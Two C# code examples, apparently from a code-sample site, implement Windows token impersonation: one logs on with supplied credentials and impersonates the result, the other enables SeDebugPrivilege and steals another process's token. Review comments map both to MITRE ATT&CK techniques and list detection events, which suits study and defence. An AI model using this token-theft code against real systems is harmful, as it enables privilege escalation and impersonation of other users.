コード例 #1
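        /// <summary>
        /// Prompts on the console for a username and password, logs that account on with
        /// LogonUser, duplicates the resulting token as a primary token, and impersonates
        /// it just long enough to print the impersonated user's name and SID.
        /// </summary>
        /// <param name="token">Receives the logon token from LogonUser. This method never closes it, so the caller must release it.</param>
        /// <param name="SecurityImpersonate">Not read by this method; kept so existing callers still compile.</param>
        /// <param name="duplicateToken">Receives the duplicated token. This method never closes it, so the caller must release it.</param>
        static void makeToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
        {
            // NOTE(review): this is the "make and impersonate token" pattern (MITRE ATT&CK T1134.003).
            // For defenders: a LogonUser call with explicit credentials normally surfaces as Security
            // event 4648 plus a 4624 logon whose type matches the Logon32Type passed below
            // (presumably LOGON32_LOGON_INTERACTIVE, type 2 - confirm against WindowsAPIHelper).

            // WindowsIdentity wraps a token handle; dispose it instead of leaving it to the finalizer.
            using (WindowsIdentity callerIdentity = WindowsIdentity.GetCurrent())
            {
                Console.WriteLine("Current User: {0}", callerIdentity.Name);
            }

            Console.Write("Enter the user you want to impersonate: ");
            string username = Console.ReadLine();

            Console.Write("Enter the password for the user you want to impersonate: ");
            using (SecureString password = GetPassword())
            {
                Console.WriteLine();

                // Environment.MachineName is passed as the domain argument, so only accounts
                // that resolve against the local machine can be logged on from here.
                // NOTE(review): ConvertToUnsecureString produces an ordinary managed string. The
                // plaintext password therefore stays in process memory until the GC reclaims it,
                // which defeats the point of collecting it into a SecureString. Marshalling the
                // SecureString to unmanaged memory and zeroing it after the call would avoid that,
                // but needs a LogonUser overload that is not visible in this listing.
                if (WindowsAPIHelper.LogonUser(username, Environment.MachineName, ConvertToUnsecureString(password), (int)WindowsAPIHelper.Logon32Type.Interactive, (int)WindowsAPIHelper.Logon32Provider.Default, ref token) == 0)
                {
                    Console.WriteLine("LogonUser failed! Are the credentials correct?");
                    return;
                }
            }

            WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();

            // Duplicate the token returned by the logon (DuplicateTokenEx, primary token).
            // A zero handle is treated as failure too, so WindowsIdentity is never built from it.
            if (!WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenPrimary, out duplicateToken)
                || duplicateToken == IntPtr.Zero)
            {
                Console.WriteLine("Unable to duplicate token!");
                return;
            }

            // WindowsIdentity(IntPtr) takes its own copy of the handle, so disposing the identity
            // does not close the caller's duplicateToken.
            using (WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken))
            // Disposing the context reverts the thread to its original identity.
            using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
            {
                if (ImpersonationContext != null)
                {
                    // Query the current identity once and release its handle afterwards.
                    using (WindowsIdentity activeIdentity = WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed))
                    {
                        Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", activeIdentity.Name, activeIdentity.User.Value);
                    }
                }
            }
        }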
コード例 #2
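        /// <summary>
        /// Opens the token of the process returned by attachProcess(), duplicates it as an
        /// impersonation token, and impersonates it just long enough to print the
        /// impersonated user's name and SID.
        /// </summary>
        /// <param name="token">Receives the token opened from the target process. This method never closes it, so the caller must release it.</param>
        /// <param name="SecurityImpersonate">Not read by this method; kept so existing callers still compile.</param>
        /// <param name="duplicateToken">Receives the duplicated impersonation token. This method never closes it, so the caller must release it.</param>
        static void stealToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
        {
            // NOTE(review): this is token theft / impersonation (MITRE ATT&CK T1134.001).
            // For defenders: the observable steps are the privilege adjustment and the
            // cross-process handle/token access (e.g. Security event 4703, Sysmon event 10).
            // The helper bodies are not shown in this listing, so confirm what they actually call.

            // WindowsIdentity wraps a token handle; dispose it instead of leaving it to the finalizer.
            using (WindowsIdentity callerIdentity = WindowsIdentity.GetCurrent())
            {
                Console.WriteLine("Current User: {0}", callerIdentity.Name);
            }

            // NOTE(review): both handles below are never closed in this method, and hToken is
            // never read again - presumably the helpers own them; verify against their bodies.
            IntPtr hToken  = enableSEDebugPrivilege();
            IntPtr hHandle = attachProcess();

            WindowsAPIHelper.OpenProcessToken(hHandle, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, out token);
            // The original ignored this call's outcome and let DuplicateTokenEx fail with a
            // misleading message; report the real point of failure instead.
            if (token == IntPtr.Zero)
            {
                Console.WriteLine("Unable to open process token!");
                return;
            }

            WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();

            Console.WriteLine("Stealing token...");
            // An impersonation token is requested because it is only applied to the current
            // thread below; per the Win32 documentation, a primary token is what the
            // process-creation APIs require.
            if (!WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenImpersonation, out duplicateToken))
            {
                Console.WriteLine("Unable to duplicate token!");
                return;
            }

            if (duplicateToken == IntPtr.Zero)
            {
                Console.WriteLine("Failed");
                return;
            }

            // WindowsIdentity(IntPtr) takes its own copy of the handle, so disposing the identity
            // does not close the caller's duplicateToken.
            using (WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken))
            // Disposing the context reverts the thread to its original identity.
            using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
            {
                if (ImpersonationContext != null)
                {
                    // Query the current identity once and release its handle afterwards.
                    using (WindowsIdentity activeIdentity = WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed))
                    {
                        Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", activeIdentity.Name, activeIdentity.User.Value);
                    }
                }
            }
        }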